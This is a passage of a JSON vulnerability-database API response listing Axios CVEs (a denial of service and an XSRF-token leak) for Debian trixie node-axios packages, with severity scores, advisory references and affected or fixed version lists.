Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg
:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"ur
l":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2024-57965"],"risk_score":1.5,"exploitability":"0.5","weighted_severity":"3.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1vkx-cwua-rqe4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/10636?format=json","vulnerability_id":"VCID-5b5u-3ngh-4fd9","summary":"Denial of Service\nAxios allows attackers to cause a denial of service (application crash) by continuing to accepting content after `maxContentLength` is exceeded.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-10742","reference_id":"","reference_type":"","scores":[{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94105","published_at":"2026-04-09T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94139","published_at":"2026-05-05T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94134","published_at":"2026-04-29T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94133","published_at":"2026-04-24T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94131","published_at":"2026-04-21T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94126","published_at":"2026-04-16T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94092","published_at":"2026-04-07T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.94101","published_at":"2026-04-08T12:55:00Z"},{"value":"0.1309","scoring_system":"epss","scoring_elements":"0.9411","published_at":"2026-04-13T12:55:00Z"},{"value":"0.1352","scoring_system":"epss","scoring_elements":"0.94199","published_at":"2026-04-04T12:
55:00Z"},{"value":"0.1352","scoring_system":"epss","scoring_elements":"0.94177","published_at":"2026-04-01T12:55:00Z"},{"value":"0.1352","scoring_system":"epss","scoring_elements":"0.94187","published_at":"2026-04-02T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-10742"},{"reference_url":"https://app.snyk.io/vuln/SNYK-JS-AXIOS-174505","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://app.snyk.io/vuln/SNYK-JS-AXIOS-174505"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10742","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10742"},{"reference_url":"https://github.com/axios/axios/commit/acabfbdf00a58bb866c9d070e8a10d1d0dbeb572","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/acabfbdf00a58bb866c9d070e8a10d1d0dbeb572"},{"reference_url":"https://github.com/axios/axios/issues/1098","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/issues/1098"},{"reference_url":"https://github.com/axios/axios/pull/1485","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/1485"},{"reference_url":"https://snyk.io/vuln/SNYK
-JS-AXIOS-174505","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-AXIOS-174505"},{"reference_url":"https://www.npmjs.com/advisories/880","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/advisories/880"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=928624","reference_id":"928624","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=928624"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-10742","reference_id":"CVE-2019-10742","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-10742"},{"reference_url":"https://github.com/advisories/GHSA-42xw-2xvc-qx8m","reference_id":"GHSA-42xw-2xvc-qx8m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-42xw-2xvc-qx8m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932080?format=json","purl":"pkg:deb/debian/node-axios@0.17.1%2Bdfsg-2?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.17.1%252Bdfsg-2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932081?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilit
ies":[{"vulnerability":"VCID-1vkx-cwua-rqe4"},{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"h
ttp://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerab
lecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2019-10742","GHSA-42xw-2xvc-qx8m"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5b5u-3ngh-4fd9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19716?format=json","vulnerability_id":"VCID-7rdk-mw2k-eqdx","summary":"Axios Cross-Site Request Forgery Vulnerability\nAn issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-45857.json","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-45857.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-45857","reference_id":"","reference_type":"","scores":[{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32738","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32711","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32775","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32773","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32747","published_at":"2026-04
-08T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32699","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32878","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32842","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32727","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00132","scoring_system":"epss","scoring_elements":"0.32751","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33193","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.3303","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33047","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00147","scoring_system":"epss","scoring_elements":"0.34739","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00161","scoring_system":"epss","scoring_elements":"0.3645","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-45857"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45857","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45857"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/2755df562b9c194fba6d8b609a383443f6a6e967","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scorin
g_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/2755df562b9c194fba6d8b609a383443f6a6e967"},{"reference_url":"https://github.com/axios/axios/commit/96ee232bd3ee4de2e657333d4d2191cd389e14d0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/96ee232bd3ee4de2e657333d4d2191cd389e14d0"},{"reference_url":"https://github.com/axios/axios/issues/6006","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-04T15:13:57Z/"}],"url":"https://github.com/axios/axios/issues/6006"},{"reference_url":"https://github.com/axios/axios/issues/6022","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/issues/6022"},{"reference_url":"https://github.com/axios/axios/pull/6028","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6028"},{"reference_url":"https://github.com/axios/axios/pull/6091","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_text
ual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6091"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.28.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v0.28.0"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.6.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v1.6.0"},{"reference_url":"https://security.netapp.com/advisory/ntap-20240621-0006","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"reference_url":"https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056099","reference_id":"1056099","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056099"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2248979","reference_id":"2248979","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2248979"},{"reference_url":"https://nvd.nist.gov/vuln/detai
l/CVE-2023-45857","reference_id":"CVE-2023-45857","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45857"},{"reference_url":"https://github.com/advisories/GHSA-wf5p-g6vw-rhxx","reference_id":"GHSA-wf5p-g6vw-rhxx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wf5p-g6vw-rhxx"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1925","reference_id":"RHSA-2024:1925","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1925"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3314","reference_id":"RHSA-2024:3314","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3314"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3316","reference_id":"RHSA-2024:3316","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3316"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3473","reference_id":"RHSA-2024:3473","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3473"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3920","reference_id":"RHSA-2024:3920","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3920"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4269","reference_id":"RHSA-2024:4269","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4269"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4455","reference_id":"RHSA-2024:4455","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4455"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:5314","reference_id":"RHSA-
2024:5314","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:5314"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:2876","reference_id":"RHSA-2025:2876","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:2876"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932086?format=json","purl":"pkg:deb/debian/node-axios@1.6.2%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.6.2%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"V
CID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pk
